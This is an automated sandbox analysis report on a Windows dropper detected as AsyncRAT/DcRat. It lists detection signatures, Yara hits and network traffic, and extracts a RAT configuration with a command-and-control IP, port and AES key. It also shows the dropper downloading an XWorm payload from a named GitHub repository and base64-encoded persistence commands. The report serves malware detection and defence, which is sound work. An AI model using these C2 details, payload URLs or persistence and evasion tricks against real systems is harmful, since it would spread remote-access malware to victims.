Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
Analysis ID:1522429
MD5:e40eb702f369e5decfb33b3d78bd4b0c
SHA1:3de25a909a7d8f20aaa4d9aba60aeb501c247f86
SHA256:16a2abe3f4f2c005e206318caf37a366e0084fa8ca8561f3642fa0b4f2f04a7e
Tags:exe
Infos:

Detection

AsyncRAT, DcRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
Yara detected DcRat
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: AsyncRAT

{"Server": "37.18.62.18", "Ports": "8060", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "RuntimeBroker.exe", "AES_key": "Wd0QrNKKApZ7VsN4yQvJ31HLn2KfmGAC", "Mutex": "RuntimeBroker.exe", "Certificate": "MIICMDCCAZmgAwIBAgIVAMebWcDfsbx7xBUtftv4J8rvdQ5tMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgwNTIwNTQxN1oXDTMzMDUxNDIwNTQxN1owEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAK9tl6zcamBVFPcQeeBAPP9RBUNPT3Mgr0m68e+VH0I6vtGeBv72FkZN9MnG89fHCaEqlu6tG1gF8bOzLjb2lpnR1pGqqOSlNMT87tzwIAwySA2NB+fnyP3MgwYXbr+TYfnG228PR3sWv7SAC4dBA0qNDkPfaF2T/FnMCjRFV1rJAgMBAAGjMjAwMB0GA1UdDgQWBBQ8oXnvUFqnsj4WW6tDCxofvf4n8TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAC5Q5hFCkd4IllWwnalB4Dv3dn4Tf5bExzP/zEalvCIE2nCMfVIYRw/n5L2eXgsTefHSY0nGEbQfzIB/W6itQXVQNoPBef5rBGxU1GvcnzAgSsMUYNcnOQnvThA2ZpiUDLElzvG/7pCszzwKGDdx7nbivK31lDxBJe3qaJXMh0nv", "ServerSignature": "bCiXv7J8PRadRPbRtO2V1U6jkfGOSIfLKIPU7qgUIMavqn7dKm3yC1zdRY+XJSVGuWOv+7CTurKpLtZpKaqGMoPUWFA5GxowHBoNkBGlURBNr42X/hDXROGJu5BE++gclzr2uNznxCAIwaRL3ohSFmknkpknGbPcYZTot2Q6ldw=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "RuntimeBroker", "AntiProcess": "false", "AntiVM": "true"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x9658:$a1: havecamera
  • 0xd031:$a2: timeout 3 > NUL
  • 0xd051:$a3: START "" "
  • 0xcedc:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0xcf91:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x65f7:$a1: havecamera
      • 0x9ae4:$a2: timeout 3 > NUL
      • 0x9b04:$a3: START "" "
      • 0x998f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
      • 0x9a44:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x65f7:$a1: havecamera
      • 0x9ae4:$a2: timeout 3 > NUL
      • 0x9b04:$a3: START "" "
      • 0x998f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
      • 0x9a44:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
      C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
      • 0x9a44:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
      • 0x998f:$s2: L2Mgc2NodGFza3MgL2
      • 0x990e:$s3: QW1zaVNjYW5CdWZmZXI
      • 0x995c:$s4: VmlydHVhbFByb3RlY3Q
      Click to see the 5 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
        • 0x63f7:$a1: havecamera
        • 0x98e4:$a2: timeout 3 > NUL
        • 0x9904:$a3: START "" "
        • 0x978f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
        • 0x9844:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
        00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
        • 0x1ecec:$b2: DcRat By qwqdanchun1
        00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DcRat_2Yara detected DcRatJoe Security
          00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
          • 0x54e8:$b1: DcRatByqwqdanchun
          • 0x29e0bc:$b2: DcRat By qwqdanchun1
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.0.RuntimeBroker.exe.610000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            3.0.RuntimeBroker.exe.610000.0.unpackWindows_Trojan_DCRat_1aeea1acunknownunknown
            • 0x65f7:$a1: havecamera
            • 0x9ae4:$a2: timeout 3 > NUL
            • 0x9b04:$a3: START "" "
            • 0x998f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
            • 0x9a44:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
            3.0.RuntimeBroker.exe.610000.0.unpackINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
            • 0x9a44:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
            • 0x998f:$s2: L2Mgc2NodGFza3MgL2
            • 0x990e:$s3: QW1zaVNjYW5CdWZmZXI
            • 0x995c:$s4: VmlydHVhbFByb3RlY3Q
            3.0.RuntimeBroker.exe.610000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
            • 0x9cc6:$q1: Select * from Win32_CacheMemory
            • 0x9d06:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
            • 0x9d54:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
            • 0x9da2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
            3.0.RuntimeBroker.exe.610000.0.unpackINDICATOR_SUSPICIOUS_EXE_DcRatByDetects executables containing the string DcRatByditekSHen
            • 0xa13e:$s1: DcRatBy

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, ProcessId: 4976, TargetFilename: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, ParentProcessId: 4976, ParentProcessName: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ProcessId: 3420, ProcessName: RuntimeBroker.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeAvira: detection malicious, Label: HEUR/AGEN.1305769
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
            Found malware configuration
            Source: 3.0.RuntimeBroker.exe.610000.0.unpackMalware Configuration Extractor: AsyncRAT {"Server": "37.18.62.18", "Ports": "8060", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "RuntimeBroker.exe", "AES_key": "Wd0QrNKKApZ7VsN4yQvJ31HLn2KfmGAC", "Mutex": "RuntimeBroker.exe", "Certificate": "MIICMDCCAZmgAwIBAgIVAMebWcDfsbx7xBUtftv4J8rvdQ5tMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgwNTIwNTQxN1oXDTMzMDUxNDIwNTQxN1owEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAK9tl6zcamBVFPcQeeBAPP9RBUNPT3Mgr0m68e+VH0I6vtGeBv72FkZN9MnG89fHCaEqlu6tG1gF8bOzLjb2lpnR1pGqqOSlNMT87tzwIAwySA2NB+fnyP3MgwYXbr+TYfnG228PR3sWv7SAC4dBA0qNDkPfaF2T/FnMCjRFV1rJAgMBAAGjMjAwMB0GA1UdDgQWBBQ8oXnvUFqnsj4WW6tDCxofvf4n8TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAC5Q5hFCkd4IllWwnalB4Dv3dn4Tf5bExzP/zEalvCIE2nCMfVIYRw/n5L2eXgsTefHSY0nGEbQfzIB/W6itQXVQNoPBef5rBGxU1GvcnzAgSsMUYNcnOQnvThA2ZpiUDLElzvG/7pCszzwKGDdx7nbivK31lDxBJe3qaJXMh0nv", "ServerSignature": "bCiXv7J8PRadRPbRtO2V1U6jkfGOSIfLKIPU7qgUIMavqn7dKm3yC1zdRY+XJSVGuWOv+7CTurKpLtZpKaqGMoPUWFA5GxowHBoNkBGlURBNr42X/hDXROGJu5BE++gclzr2uNznxCAIwaRL3ohSFmknkpknGbPcYZTot2Q6ldw=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "RuntimeBroker", "AntiProcess": "false", "AntiVM": "true"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeReversingLabs: Detection: 95%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeVirustotal: Detection: 72%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeReversingLabs: Detection: 95%
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeVirustotal: Detection: 72%Perma Link
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeReversingLabs: Detection: 44%
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeVirustotal: Detection: 58%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb%% source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
            Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
            Source: global trafficTCP traffic: 192.168.2.6:49713 -> 37.18.62.18:8060
            Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
            Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
            Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
            Source: Joe Sandbox ViewASN Name: FLEXLTD-ASRU FLEXLTD-ASRU
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: unknownTCP traffic detected without corresponding DNS query: 37.18.62.18
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeCode function: 0_2_00007FF6517916C0 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,InternetReadFile,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,InternetCloseHandle,InternetCloseHandle,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF6517916C0
            Source: global trafficHTTP traffic detected: GET /errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe HTTP/1.1User-Agent: ProgramDownloaderHost: github.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe HTTP/1.1User-Agent: ProgramDownloaderCache-Control: no-cacheHost: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: RuntimeBroker.exe, 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/3;C
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/D;
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612612426.000001FDB6A0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612612426.000001FDB6A1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeString found in binary or memory: https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exeProgramDownloade
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exer
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/a
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/e.b
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A8F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612612426.000001FDB6A1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe0
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeA4z
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeWYL
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exemYj
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exetXa
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49712 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
